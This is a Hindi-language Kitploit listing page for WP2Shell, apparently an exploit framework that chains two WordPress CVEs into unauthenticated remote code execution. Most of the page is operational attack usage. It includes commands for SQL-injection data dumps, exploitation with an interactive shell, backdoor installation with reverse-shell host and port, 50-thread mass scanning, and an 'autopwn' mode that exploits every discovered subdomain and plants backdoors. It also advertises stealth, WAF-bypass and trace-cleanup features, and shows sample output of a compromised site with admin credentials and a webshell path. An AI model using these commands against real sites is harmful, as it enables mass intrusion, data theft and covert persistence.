Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/g0d150ne/wp2shell
भेद्यता परीक्षण फ्रेमवर्कटोहीभेद्यता स्कैनरशोषण फ्रेमवर्कस्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणWAF बाईपासरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubg0d150ne/wp2shell
729 दिन पहलेअभी तक समीक्षित नहीं

WP2Shell

मॉड्यूलर WordPress प्री-ऑथ एक्सप्लॉइट फ्रेमवर्क जो SQL इंजेक्शन और ऑथेंटिकेशन बायपास को चेन करके रिमोट कोड एक्ज़ीक्यूशन, इंटरैक्टिव शेल, बैकडोर और मास भेद्यता स्कैनिंग प्रदान करता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

WP2Shell - WordPress प्री-ऑथ RCE एक्सप्लॉइट

CVE-2026-63030 + CVE-2026-60137
संस्करण: 4.0.0
लेखक: G0D150NE

📌 अवलोकन

WP2Shell, WordPress प्री-ऑथेंटिकेशन रिमोट कोड एक्सीक्यूशन के लिए एक फुल-चेन एक्सप्लॉइट टूल है। यह दो गंभीर कमजोरियों को जोड़ता है:

  • CVE-2026-63030 - REST API बैच एंडपॉइंट में SQL इंजेक्शन
  • CVE-2026-60137 - oEmbed कैश पॉइज़निंग के माध्यम से ऑथेंटिकेशन बाईपास

यह टूल कमजोर WordPress इंस्टॉलेशन पर बिना किसी प्रमाणीकरण के पूर्ण नियंत्रण प्राप्त करने की अनुमति देता है - डिटेक्शन से लेकर पूर्ण RCE और पर्सिस्टेंस तक।

⚡ विशेषताएँ

  • 🔍 गैर-विनाशकारी जाँच - सुरक्षित कमजोरी की पुष्टि
  • 📊 मल्टी-तकनीक निष्कर्षण - UNION, एरर-आधारित, ब्लाइंड SQLi
  • 🚀 पूर्ण RCE श्रृंखला - SQLi से एडमिन अकाउंट निर्माण तक
  • 🐚 वेबशेल तैनाती - छिपा हुआ प्लगिन-आधारित बैकडोर
  • 🧹 सफाई क्षमता - सभी निशान हटाएँ
  • 📡 मास स्कैनिंग - कई लक्ष्यों के लिए थ्रेडेड स्कैनर
  • 🤖 ऑटोपॉन मोड - सबडोमेन खोज + स्वचालित शोषण
  • 🌐 प्रॉक्सी रोटेशन - रोटेटिंग प्रॉक्सी के लिए समर्थन
  • 🕵️ स्टील्थ मोड - यादृच्छिक विलंब और WAF बाईपास तकनीकें

🔧 इंस्टॉलेशन

root@kitploit:~
# Clone repository
git clone https://github.com/g0d150ne/wp2shell.git
cd wp2shell

# No dependencies needed - uses Python 3.8+ standard library
chmod +x wp2shell.py

🎯 उपयोग

कमांड संरचना

root@kitploit:~
python3 wp2shell.py [COMMAND] [OPTIONS] [TARGET]

उपलब्ध कमांड

कमांडविवरण
checkगैर-विनाशकारी कमजोरी पुष्टि
readSQL इंजेक्शन के माध्यम से डेटा निकालें
exploitपूर्ण प्री-ऑथ RCE श्रृंखला
shellमौजूदा क्रेडेंशियल्स के साथ वेबशेल तैनात करें
masscanकई लक्ष्यों की मास स्कैन
autopwnस्वचालित खोज → स्कैन → शोषण

🚀 उदाहरण

1. कमजोरी जाँच

root@kitploit:~
python3 wp2shell.py check https://target.com
root@kitploit:~
python3 wp2shell.py check https://target.com --confirm-timing --sleep 5

2. डेटा निष्कर्षण

बेसिक फिंगरप्रिंट:

root@kitploit:~
python3 wp2shell.py read https://target.com

उपयोगकर्ता निकालें:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset users

कस्टम क्वेरी:

root@kitploit:~
python3 wp2shell.py read https://target.com --query "SELECT @@version"

पूरा डेटाबेस डंप करें:

root@kitploit:~
python3 wp2shell.py read https://target.com --preset dumpall --max-length 4096

3. पूर्ण शोषण

बेसिक एक्सप्लॉइट:

root@kitploit:~
python3 wp2shell.py exploit https://target.com

इंटरैक्टिव शेल के साथ एक्सप्लॉइट:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --interactive

बैकडोर इंस्टॉलेशन के साथ एक्सप्लॉइट:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --backdoor --lhost 192.168.1.100 --lport 4444

डेटाबेस डंप के साथ एक्सप्लॉइट:

root@kitploit:~
python3 wp2shell.py exploit https://target.com --dumpdb

क्लीनअप के साथ एक्सप्लॉइट (निशान हटाएँ):

root@kitploit:~
python3 wp2shell.py exploit https://target.com --cleanup

4. मौजूदा एडमिन क्रेडेंशियल्स का उपयोग

root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --interactive
root@kitploit:~
python3 wp2shell.py shell https://target.com --user admin --password secret123 --command "whoami"

5. मास स्कैनिंग

root@kitploit:~
# Create targets file
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# Scan with 50 threads
python3 wp2shell.py masscan --file targets.txt --threads 50 --output results.csv

6. ऑटोपॉन मोड (पूर्ण स्वचालन)

root@kitploit:~
python3 wp2shell.py autopwn --domain example.com --lhost 192.168.1.100

यह निम्न कार्य करेगा:

  1. crt.sh के माध्यम से सबडोमेन खोजें
  2. WordPress इंस्टॉलेशन की पहचान करें
  3. सभी कमजोर साइटों का शोषण करें
  4. सफल लक्ष्यों पर बैकडोर इंस्टॉल करें

🎮 इंटरैक्टिव शेल

शोषण के बाद, आपको एक पूर्ण इंटरैक्टिव शेल मिलता है:

root@kitploit:~
python3 wp2shell.py exploit https://target.com -i
root@kitploit:~
[*] Interactive shell — type 'exit' to quit
/var/www/html $ id
uid=33(www-data) gid=33(www-data)
/var/www/html $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
/var/www/html $ exit

🛡️ विकल्प संदर्भ

सामान्य विकल्प

विकल्पविवरण
--timeoutHTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 30)
--proxiesकॉमा-सेपरेटेड प्रॉक्सी सूची (जैसे, http://127.0.0.1:8080)
--stealthयादृच्छिक विलंब के साथ स्टील्थ मोड सक्षम करें
-v, --verboseडीबग आउटपुट सक्षम करें
-q, --quietबैनर और सूचना संदेश दबाएँ

रीड कमांड विकल्प

विकल्पविवरण
--prefixटेबल प्रीफिक्स (डिफ़ॉल्ट: wp_)
--auto-prefixटेबल प्रीफिक्स स्वतः खोजें
--max-lengthप्रति मान अधिकतम वर्ण (डिफ़ॉल्ट: 128)
--techniqueनिष्कर्षण तकनीक: auto/union/error/blind
--presetडेटा प्रीसेट: fingerprint/users/dumpall
--queryनिकालने के लिए मनमाना SQL एक्सप्रेशन

एक्सप्लॉइट कमांड विकल्प

विकल्पविवरण
--prefixटेबल प्रीफिक्स (डिफ़ॉल्ट: wp_)
--no-discoverऑटो-डिस्कवरी छोड़ें, डिफ़ॉल्ट का उपयोग करें
-i, --interactiveशोषण के बाद शेल में जाएँ
-c, --commandशोषण के बाद एकल कमांड निष्पादित करें
--backdoorपर्सिस्टेंस बैकडोर इंस्टॉल करें
--lhostरिवर्स शेल के लिए LHOST (डिफ़ॉल्ट: 10.0.0.1)
--lportरिवर्स शेल के लिए LPORT (डिफ़ॉल्ट: 4444)
--dumpdbशोषण के बाद डेटाबेस डंप करें
--cleanupबाहर निकलने पर बनाए गए उपयोगकर्ता और वेबशेल को हटाएँ

🔬 तकनीकी विवरण

कमजोरी श्रृंखला

  1. SQL इंजेक्शन (CVE-2026-63030)

    • /wp-json/batch/v1 एंडपॉइंट में होता है
    • author_exclude पैरामीटर टाइम-आधारित ब्लाइंड SQLi के लिए कमजोर है
    • UNION और एरर-आधारित निष्कर्षण की अनुमति देता है
  2. ऑथेंटिकेशन बाईपास (CVE-2026-60137)

    • /_embed पैरामीटर के माध्यम से oEmbed कैश पॉइज़निंग
    • कस्टमाइज़र चेंजसेट के माध्यम से एडमिन उपयोगकर्ता बनाने की अनुमति देता है
    • विशेषाधिकार प्राप्त अकाउंट निर्माण के लिए री-एंट्री श्रृंखला ट्रिगर करता है

समर्थित WordPress संस्करण

संस्करणस्थिति
6.9.0✅ कमजोर
6.9.1✅ कमजोर
6.9.2✅ कमजोर
6.9.3✅ कमजोर
6.9.4✅ कमजोर
7.0.0✅ कमजोर
7.0.1✅ कमजोर
≥ 7.0.2❌ पैच किया गया

निष्कर्षण तकनीकें

तकनीकगतिडेटा आकारआवश्यकताएँ
UNION⚡ बहुत तेज़असीमितलक्ष्य UNION को फ़िल्टर नहीं करना चाहिए
एरर🚀 तेज़~30 वर्ण/अनुरोधलक्ष्य को एरर संदेश प्रदर्शित करने चाहिए
ब्लाइंड🐢 धीमीअसीमितबूलियन ओरेकल उपलब्ध होना चाहिए

📊 आउटपुट उदाहरण

सफल शोषण

root@kitploit:~
░▒▓█▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░▒▓███████▓▒░ ░▒▓███████▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓████████▓▒░▒▓█▓▒░      ░▒▓█▓▒░        
                                                                                                                                                                                                                            
  CVE-2026-63030 + CVE-2026-60137
  WordPress Pre-Auth RCE  [v4.0.0]
  + G0D150NE

[1/7] Reconnaissance
  Target: https://target.com
  WordPress 6.9.3
[+] UNION extraction available (in-band, 1 request/value)

[2/7] Enumerating target
[+] Discovered table prefix: wp_

[3/7] Locating embed target
[+] Embed URL: https://target.com/2020/01/01/hello-world/

[4/7] Seeding oEmbed cache posts
[+] Seed payload delivered

[5/7] Extracting cache post IDs
[+] Cache IDs: [12345, 12346, 12347, 12348]

[6/7] Triggering escalation chain
[+] Administrator created via re-entry chain

[7/7] Deploying webshell
[+] Authenticated
[+] RCE confirmed
  uid: www-data

[+] ========================================================
[+]   TARGET COMPROMISED
[+]   Admin:  wp_service_a1b2 / G7hK9xQw2p$L!mN
[+]   Shell:  https://target.com/wp-content/plugins/cache_a1b2/cache_a1b2.php
[+] ========================================================

⚠️ अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग अवैध है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदारी नहीं लेते हैं।

📚 संदर्भ

  • CVE-2026-63030
  • CVE-2026-60137
  • WordPress सुरक्षा सलाह
  • WP2Shell तकनीकी ब्लॉग

🤝 योगदान

कोई बग मिला? टूल को बेहतर बनाना चाहते हैं? पुल रिक्वेस्ट का स्वागत है!

  1. रिपॉजिटरी को फोर्क करें
  2. अपनी फीचर ब्रांच बनाएँ
  3. अपने बदलाव कमिट करें
  4. ब्रांच पर पुश करें
  5. पुल रिक्वेस्ट खोलें

📄 लाइसेंस

MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें।

टूल डाउनलोड करें